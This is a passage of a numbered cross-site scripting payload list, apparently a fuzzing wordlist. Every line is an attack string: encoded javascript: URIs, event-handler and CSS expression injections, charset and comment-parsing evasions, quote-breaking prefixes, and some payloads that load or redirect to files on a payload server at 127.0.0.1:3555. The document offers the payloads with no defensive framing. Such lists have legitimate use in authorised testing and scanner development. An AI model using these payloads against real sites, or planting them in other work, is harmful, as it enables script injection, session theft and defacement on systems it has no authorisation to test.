  1453. "><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#75;&#67;&#70;&#39;&#41;&#59;>
  1454. '><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#75;&#67;&#70;&#39;&#41;&#59;>
  1455. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  1456. "><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  1457. '><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  1458. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  1459. "><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  1460. '><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  1461. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  1462. "><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  1463. '><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  1464. “><s”%2b”cript>alert(1)</script>
  1465. “><ScRiPt>alert(1)</script>
  1466. “><<script>alert(1);//<</script>
  1467. foo%00<script>alert(1)</script>
  1468. "><script>alert(1)</script>
  1469. '><script>alert(1)</script>
  1470. <scr<script>ipt>alert(1)</scr</script>ipt>
  1471. "><scr<script>ipt>alert(1)</scr</script>ipt>
  1472. '><scr<script>ipt>alert(1)</scr</script>ipt>
  1473. ';alert(String.fromCharCode(75,67,70))//\';alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//\";alert(String.fromCharCode(75,67,70))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(75,67,70))&lt;/SCRIPT&gt;
  1474. ';alert(String.fromCharCode(75,67,70))//\';alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//\";alert(String.fromCharCode(75,67,70))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}
  1475. '';!--"&lt;X&gt;=&amp;{()}
  1476. &lt;IMG SRC="javascript:alert(1);"&gt;
  1477. &lt;IMG SRC=javascript:alert(1)&gt;
  1478. &lt;IMG SRC=JaVaScRiPt:alert(1)&gt;
  1479. &lt;IMG SRC=javascript:alert(&amp;quot;X&amp;quot;)&gt;
  1480. &lt;IMG SRC=`javascript:alert("Kerala Cyber Force says, 'X'")`&gt;
  1481. &lt;IMG """&gt;&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;"&gt;
  1482. &lt;IMG SRC=javascript:alert(String.fromCharCode(75,67,70))&gt;
  1483. &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
  1484. &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
  1485. &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
  1486. &lt;IMG SRC="jav&#x09;ascript:alert(1);"&gt;
  1487. &lt;IMG SRC="jav&amp;#x09;ascript:alert(1);"&gt;
  1488. &lt;IMG SRC="jav&amp;#x0A;ascript:alert(1);"&gt;
  1489. &lt;IMG SRC="jav&amp;#x0D;ascript:alert(1);"&gt;
  1490. <IMG SRC=`javascript:alert(1)`>
  1491. "><IMG SRC=`javascript:alert(1)`>
  1492. '><IMG SRC=`javascript:alert(1)`>
  1493. &lt;IMG&#x0D;SRC&#x0D;=&#x0D;"&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;'&#x0D;X&#x0D;S&#x0D;S&#x0D;'&#x0D;)&#x0D;"&#x0D;>&#x0D;
  1494. <IMG STYLE="X:expr/*X*/ession(alert(1))">
  1495. "><IMG STYLE="X:expr/*X*/ession(alert(1))">
  1496. '><IMG STYLE="X:expr/*X*/ession(alert(1))">
  1497. <IMG DYNSRC="javascript:alert(1)">
  1498. "><IMG DYNSRC="javascript:alert(1)">
  1499. '><IMG DYNSRC="javascript:alert(1)">
  1500. <img dynsrc="javascript:alert(1);">
  1501. "><img dynsrc="javascript:alert(1);">
  1502. '><img dynsrc="javascript:alert(1);">
  1503. <IMG LOWSRC="javascript:alert(1)">
  1504. "><IMG LOWSRC="javascript:alert(1)">
  1505. '><IMG LOWSRC="javascript:alert(1)">
  1506. <input type="image" dynsrc="javascript:alert(1);">
  1507. "><input type="image" dynsrc="javascript:alert(1);">
  1508. '><input type="image" dynsrc="javascript:alert(1);">
  1509. <STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>X
  1510. "><STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>X
  1511. '><STYLE>li {list-style-image: url("javascript:alert(1)");}</STYLE><UL><LI>X
  1512. <DIV STYLE="width: expression(alert(1));">
  1513. "><DIV STYLE="width: expression(alert(1));">
  1514. '><DIV STYLE="width: expression(alert(1));">
  1515. <div style="width: expression(alert(1););">
  1516. "><div style="width: expression(alert(1););">
  1517. '><div style="width: expression(alert(1););">
  1518. <STYLE>@im\port'\ja\vasc\ript:alert(1)';</STYLE>
  1519. "><STYLE>@im\port'\ja\vasc\ript:alert(1)';</STYLE>
  1520. '><STYLE>@im\port'\ja\vasc\ript:alert(1)';</STYLE>
  1521. <X STYLE="X:expression(alert(1))">
  1522. "><X STYLE="X:expression(alert(1))">
  1523. '><X STYLE="X:expression(alert(1))">
  1524. exp/*<A STYLE='no\X:noX("*//*");X:&#101;x&#x2F;*X*//*/*/pression(alert(1))'>
  1525. <STYLE TYPE="text/javascript">alert(1);</STYLE>
  1526. "><STYLE TYPE="text/javascript">alert(1);</STYLE>
  1527. '><STYLE TYPE="text/javascript">alert(1);</STYLE>
  1528. <STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>
  1529. "><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>
  1530. '><STYLE>.X{background-image:url("javascript:alert(1)");}</STYLE>
  1531. <A CLASS=X></A>
  1532. "><A CLASS=X></A>
  1533. '><A CLASS=X></A>
  1534. <STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>
  1535. "><STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>
  1536. '><STYLE type="text/css">BODY{background:url("javascript:alert(1)")}</STYLE>
  1537. <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
  1538. "><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
  1539. '><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
  1540. <? echo('<SCR)';echo('IPT>alert(1)</SCRIPT>'); ?>
  1541. "><? echo('<SCR)';echo('IPT>alert(1)</SCRIPT>'); ?>
  1542. '><? echo('<SCR)';echo('IPT>alert(1)</SCRIPT>'); ?>
  1543. <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;">
  1544. "><META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;">
  1545. '><META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1)&lt;/SCRIPT&gt;">
  1546. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
  1547. "><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
  1548. '><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
  1549. <XML ID=0><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(1)"&gt;</B></I></XML>
  1550. "><XML ID=0><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(1)"&gt;</B></I></XML>
  1551. '><XML ID=0><I><B>&lt;IMG SRC="javas<!-- -->cript:alert(1)"&gt;</B></I></XML>
  1552. <SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  1553. "><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  1554. '><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  1555. a="get";b="URL(\"";c="javascript:";d="alert(1);\")";eval(a+b+c+d);
  1556. <?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;alert(&quot;X&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
  1557. "><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;alert(&quot;X&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
  1558. '><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;alert(&quot;X&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
  1559. <xml src="javascript:alert(1);">
  1560. "><xml src="javascript:alert(1);">
  1561. '><xml src="javascript:alert(1);">
  1562. <xml id="X"><a><b><script>alert(1);</script>
  1563. "><script>alert(1);</script>
  1564. '><script>alert(1);</script>;</b></a></xml>
  1565. <div datafld="b" dataformatas="html" datasrc="#X"></div>
  1566. "><div datafld="b" dataformatas="html" datasrc="#X"></div>
  1567. '><div datafld="b" dataformatas="html" datasrc="#X"></div>
  1568. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  1569. "><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  1570. '><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(1);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  1571. %253cscript%253ealert(1)%253c/script%253e
  1572. foo\’; alert(1);//’;
  1573. [b][style="style=width:expre/**/ssion(alert(1))xt]bold[/style][/b]
  1574. [b][style="onmouseover="alert(1);]bold[/style][/b]
  1575. </script><script >alert(1)</script>
  1576. "></script><script >alert(1)</script>
  1577. '></script><script >alert(1)</script>
  1578. ‘; alert(1); var foo=’
  1579. <img src="" onerror=alert(1)>
  1580. "><img src="" onerror=alert(1)>
  1581. '><img src="" onerror=alert(1)>
  1582. <img src="" onerror=alert(1);>
  1583. "><img src="" onerror=alert(1);>
  1584. '><img src="" onerror=alert(1);>
  1585. ><img src="x:x" onerror=alert(1)>
  1586. s%22%20style=x:expression(alert(1))
  1587. s%22%20style=%22background:url(javascript:alert(’X’))
  1588. s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27X%3F%29%29
  1589. %22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(1);>
  1590. <IMG SRC="  javascript:alert(1);">
  1591. "><IMG SRC="  javascript:alert(1);">
  1592. '><IMG SRC="  javascript:alert(1);">
  1593. &lt;IMG SRC=" &amp;#14; javascript:alert(1);"&gt;
  1594. &lt;SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"&gt;&lt;/SCRIPT&gt;
  1595. &lt;SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"&gt;&lt;/SCRIPT&gt;
  1596. &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(1)&gt;
  1597. &lt;&lt;SCRIPT&gt;alert(1);//&lt;&lt;/SCRIPT&gt;
  1598. &lt;IMG SRC="javascript:alert(1)"
  1599. &lt;iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html &lt;
  1600. &lt;SCRIPT&gt;a=/X/
  1601. alert(a.source)&lt;/SCRIPT&gt;
  1602. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(1);&lt;/SCRIPT&gt;
  1603. &lt;INPUT TYPE="IMAGE" SRC="javascript:alert(1);"&gt;
  1604. &lt;BODY BACKGROUND="javascript:alert(1)"&gt;
  1605. &lt;BODY ONLOAD=alert(1)&gt;
  1606. &lt;IMG LOWSRC="javascript:alert(1)"&gt;
  1607. &lt;BGSOUND SRC="javascript:alert(1);"&gt;
  1608. &lt;BR SIZE="&{alert(1)}"&gt;
  1609. &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;X&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;X
  1610. &lt;IMG SRC='vbscript:msgbox(1)'&gt;
  1611. &lt;IMG SRC="mocha:[code]"&gt;
  1612. &lt;IMG SRC="livescript:[code]"&gt;
  1613. <img src='vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/X.html"'>
  1614. "><img src='vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/X.html"'>
  1615. '><img src='vbscript:do%63ument.lo%63ation="http://127.0.0.1:3555/xss_serve_payloads/X.html"'>
  1616. &lt;META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);"&gt;
  1617. &lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&gt;
  1618. &lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);"&gt;
  1619. &lt;IFRAME SRC="javascript:alert(1);"&gt;&lt;/IFRAME&gt;
  1620. &lt;FRAMESET&gt;&lt;FRAME SRC="javascript:alert(1);"&gt;&lt;/FRAMESET&gt;
  1621. &lt;TABLE BACKGROUND="javascript:alert(1)"&gt;
  1622. &lt;TABLE&gt;&lt;TD BACKGROUND="javascript:alert(1)"&gt;
  1623. &lt;DIV STYLE="background-image: url(javascript:alert(1))"&gt;
  1624. &lt;DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"&gt;
  1625. &lt;DIV STYLE="background-image: url(&amp;#1;javascript:alert(1))"&gt;
  1626. &lt;DIV STYLE="width: expression(alert(1));"&gt;
  1627. &lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(1)';&lt;/STYLE&gt;
  1628. &lt;IMG STYLE="X:expr/*X*/ession(alert(1))"&gt;
  1629. &lt;X STYLE="X:expression(alert(1))"&gt;
  1630. exp/*&lt;A STYLE='no\X:noX("*//*");
  1631. &lt;STYLE TYPE="text/javascript"&gt;alert(1);&lt;/STYLE&gt;
  1632. &lt;STYLE&gt;.X{background-image:url("javascript:alert(1)");}&lt;/STYLE&gt;&lt;A CLASS=X&gt;&lt;/A&gt;
  1633. &lt;STYLE type="text/css"&gt;BODY{background:url("javascript:alert(1)")}&lt;/STYLE&gt;
  1634. &lt;SCRIPT&gt;alert(1);&lt;/SCRIPT&gt;
  1635. &lt;BASE HREF="javascript:alert(1);//"&gt;
  1636. &lt;OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"&gt;&lt;/OBJECT&gt;
  1637. &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(1)&gt;&lt;/OBJECT&gt;
  1638. &lt;EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;
  1639. a="get";&#10;b="URL(\"";&#10;c="javascript:";&#10;d="alert(1);\")";&#10;eval(a+b+c+d);
  1640. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[cript:alert(1);"&gt;]]&gt;
  1641. &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  1642. &lt;XML ID=0&gt;&lt;I&gt;&lt;B&gt;&amp;lt;IMG SRC="javas&lt;!-- --&gt;cript:alert(1)"&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  1643. &lt;SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;
  1644. &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
  1645. &lt;HTML&gt;&lt;BODY&gt;
  1646. &lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;
  1647. &lt;?import namespace="t" implementation="#default#time2"&gt;
  1648. &lt;t:set attributeName="innerHTML" to="X&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;X&amp;quot;)&amp;lt;/SCRIPT&amp;gt;"&gt;
  1649. &lt;/BODY&gt;&lt;/HTML&gt;
  1650. &lt;? echo('&lt;SCR)';
  1651. echo('IPT&gt;alert(1)&lt;/SCRIPT&gt;'); ?&gt;
  1652. &lt;META HTTP-EQUIV="Set-Cookie" Content="USERID=&amp;lt;SCRIPT&amp;gt;alert(1)&amp;lt;/SCRIPT&amp;gt;"&gt;
  1653. &lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
  1654. &lt;A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;X&lt;/A&gt;
  1655. &lt;A HREF="http://1113982867/"&gt;X&lt;/A&gt;
  1656. &lt;A HREF="http://0x42.0x0000066.0x7.0x93/"&gt;X&lt;/A&gt;
  1657. &lt;A HREF="http://0102.0146.0007.00000223/"&gt;X&lt;/A&gt;
  1658. &lt;A HREF="h&#x0A;tt&#09;p://6&amp;#9;6.000146.0x7.147/"&gt;X&lt;/A&gt;
  1659. &lt;A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html"&gt;X&lt;/A&gt;
  1660. &lt;A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html"&gt;X&lt;/A&gt;
  1661. &lt;A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./"&gt;X&lt;/A&gt;
  1662. &lt;A HREF="javascript:document.location='http://127.0.0.1:3555/xss_serve_payloads/X.html'"&gt;X&lt;/A&gt;
  1663. &lt;A HREF="http://www.keralacyberhttp://www.keralacyberforce.in/force.in/"&gt;X&lt;/A&gt;
  1664. <form id="test" /><button form="test" formaction="javascript:alert(1)">X
  1665. "><form id="test" /><button form="test" formaction="javascript:alert(1)">X
  1666. '><form id="test" /><button form="test" formaction="javascript:alert(1)">X
  1667. <input onblur=javascript:alert(1) autofocus><input autofocus>
  1668. "><input onblur=javascript:alert(1) autofocus><input autofocus>
  1669. '><input onblur=javascript:alert(1) autofocus><input autofocus>
  1670. <video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video>
  1671. "><video poster=javascript:alert(1)//></video>
  1672. '><video poster=javascript:alert(1)//></video>
  1673. "><video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video>
  1674. "><video poster=javascript:alert(1)//></video>
  1675. '><video poster=javascript:alert(1)//></video>
  1676. '><video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video>
  1677. "><video poster=javascript:alert(1)//></video>
  1678. '><video poster=javascript:alert(1)//></video>
  1679. <head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
  1680. "><head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
  1681. '><head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>
  1682. <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
  1683. "><SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
  1684. '><SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
  1685. <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
  1686. "><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
  1687. '><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
  1688. <embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></embed>
  1689. "><embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></embed>
  1690. '><embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></embed>
  1691. <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
  1692. "><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
  1693. '><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
  1694. <b <script>alert(1)//</script>0</script></b>
  1695. "><b <script>alert(1)//</script>0</script></b>
  1696. '><b <script>alert(1)//</script>0</script></b>
  1697. <script src="javascript:alert(1)">
  1698. "><script src="javascript:alert(1)">
  1699. '><script src="javascript:alert(1)">
  1700. <image src="javascript:alert(1)">
  1701. "><image src="javascript:alert(1)">
  1702. '><image src="javascript:alert(1)">
  1703. <div style=width:1px;filter:glow onfilterchange=alert(1)>x
  1704. "><div style=width:1px;filter:glow onfilterchange=alert(1)>x
  1705. '><div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
  1706. "><div style=width:1px;filter:glow onfilterchange=alert(1)>x
  1707. "><div style=width:1px;filter:glow onfilterchange=alert(1)>x
  1708. '><div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
  1709. '><div style=width:1px;filter:glow onfilterchange=alert(1)>x
  1710. "><div style=width:1px;filter:glow onfilterchange=alert(1)>x
  1711. '><div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>
  1712. <? foo="><script>alert(1)</script>
  1713. "><script>alert(1)</script>
  1714. '><script>alert(1)</script>">
  1715. <! foo="><script>alert(1)</script>
  1716. "><script>alert(1)</script>
  1717. '><script>alert(1)</script>">
  1718. </ foo="><script>alert(1)</script>
  1719. "><script>alert(1)</script>
  1720. '><script>alert(1)</script>">
  1721. <? foo="><x foo='?><script>alert(1)</script>
  1722. "><script>alert(1)</script>
  1723. '><script>alert(1)</script>'>">
  1724. <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>
  1725. "><script>alert(1)</script>
  1726. '><script>alert(1)</script>">
  1727. <% foo><x foo="%><script>alert(1)</script>
  1728. "><script>alert(1)</script>
  1729. '><script>alert(1)</script>">
  1730. <iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.html!X.html></iframe>
  1731. "><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.html!X.html></iframe>
  1732. '><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.html!X.html></iframe>
  1733. <iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.gif!X.html></iframe>
  1734. "><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.gif!X.html></iframe>
  1735. '><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.gif!X.html></iframe>
  1736. <div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  1737. "><div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  1738. '><div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
  1739. <img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
  1740. "><img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
  1741. '><img[a][b]src=x[d]onerror[c]=[e]"alert(1)">
  1742. <a href="[a]java[b]script[c]:alert(1)">XXX</a>
  1743. "><a href="[a]java[b]script[c]:alert(1)">XXX</a>
  1744. '><a href="[a]java[b]script[c]:alert(1)">XXX</a>
  1745. <img src="x` `<script>alert(1)</script>
  1746. "><script>alert(1)</script>
  1747. '><script>alert(1)</script>"` `>
  1748. <img src onerror /" '"= alt=alert(1)//">
  1749. "><img src onerror /" '"= alt=alert(1)//">
  1750. '><img src onerror /" '"= alt=alert(1)//">
  1751. <title onpropertychange=alert(1)></title><title title=></title>
  1752. "><title onpropertychange=alert(1)></title><title title=></title>
  1753. '><title onpropertychange=alert(1)></title><title title=></title>
  1754. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">
  1755. "><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">
  1756. '><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">
  1757. <!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">
  1758. "><!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">
  1759. '><!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">
  1760. <?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">
  1761. "><?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">
  1762. '><?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">
  1763. <!--[if]><script>alert(1)</script -->
  1764. "><!--[if]><script>alert(1)</script -->
  1765. '><!--[if]><script>alert(1)</script -->
  1766. "><!--[if]><script>alert(1)</script -->
  1767. '><!--[if]><script>alert(1)</script -->
  1768. <!--[if<img src=x onerror=alert(2)//]> -->
  1769. "><!--[if<img src=x onerror=alert(2)//]> -->
  1770. '><!--[if<img src=x onerror=alert(2)//]> -->
  1771. <!-- `<img/src=xx:xx onerror=alert(1)//--!>
  1772. "><!-- `<img/src=xx:xx onerror=alert(1)//--!>
  1773. '><!-- `<img/src=xx:xx onerror=alert(1)//--!>
  1774. <xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
  1775. "><xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
  1776. '><xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>
  1777. <frameset onload=alert(1)>
  1778. "><frameset onload=alert(1)>
  1779. '><frameset onload=alert(1)>
  1780. <table background="javascript:alert(1)"></table>
  1781. "><table background="javascript:alert(1)"></table>
  1782. '><table background="javascript:alert(1)"></table>
  1783. <!--<img src="--><img src=x onerror=alert(1)//">
  1784. "><!--<img src="--><img src=x onerror=alert(1)//">
  1785. '><!--<img src="--><img src=x onerror=alert(1)//">
